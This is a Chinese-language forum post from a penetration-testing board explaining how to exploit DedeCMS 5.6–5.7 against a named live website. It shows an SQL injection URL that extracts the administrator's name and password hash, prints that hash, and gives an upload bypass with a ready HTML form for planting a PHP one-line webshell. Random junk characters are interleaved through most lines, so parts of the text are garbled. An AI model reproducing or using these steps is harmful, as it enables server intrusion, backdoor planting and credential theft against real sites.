中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
/ x* O. k/ `& B" t; c. O  U0 y8 N这站 http://www.political-security.com/" L8 Z2 X2 p0 }  K9 |
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
, W) ^* J7 U  u  \, awww.political-security.com/data/mysql_error_trace.inc 爆后台" a  }4 D0 O/ T' Q, B7 e
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。5 a" V& V  o4 a2 ?0 M- }
然后写上语句 6 h" n) f1 ]  R9 t# t
查看管理员帐号
! P6 N) g! x( C3 \2 d3 g7 _http://www.political-security.co ... &membergroup=@`# ^% |) s2 e# k. S  c4 ]  Z
9 Z4 Q7 V. G1 W7 X1 Y* J4 B
admin , R8 D3 }2 W0 _

- D" i# Q, F/ {& F. w  n查看管理员密码4 {1 y! I6 g. @
 http://www.political-security.co ... &membergroup=@`( g' o" A3 @0 `& h

$ u: Y& f$ X- e! o" }8d29b1ef9f8c5a5af429  {: A  T9 t" s+ ]! z, S3 D& |( F

: e) ?( T. d3 t查看管理员密码
% f; H" @, F6 I' n% R
. w8 X. s% O  j, x$ f得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
1 }7 a- O4 @, o( d
. [+ Z! h/ ~+ i- q/ V& @' a8d20 j) f" u0 v8 \+ e4 m5 B2 [
9b1ef9f8c5a5af42; f. L0 y& t0 L( e
93 R4 u* x' o  n
8 ?( k3 _, W7 [& R4 G# f
cmd5没解出来 只好测试第二个方法
* o+ T9 u4 `1 r$ @: `% {, Y2 a3 e% i4 t2 n
5 u+ ~" x% d: ^! ?" d- Z5 A
②上传漏洞:0 Y. H, _3 ]& ~) S5 ~9 {$ J
- \/ V+ j+ m' d: A
只要登陆会员中心,然后访问页面链接- B3 {# F/ f( j
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”9 y$ g9 ^/ u9 R5 O+ c: X5 {

2 Q4 A% O7 ?& K* k2 x& K: T+ n如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
/ e( ?6 ^3 ^2 x( Z% w7 M
  p, i: A) Z* M2 n% z! G于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
& v' @: Z* W. G5 N  }, u
5 U8 L+ I$ m) O; a  z<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ e6 S1 W6 K8 l3 C$ ?或者5 A" k0 L- ?+ g
即可上传成功




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2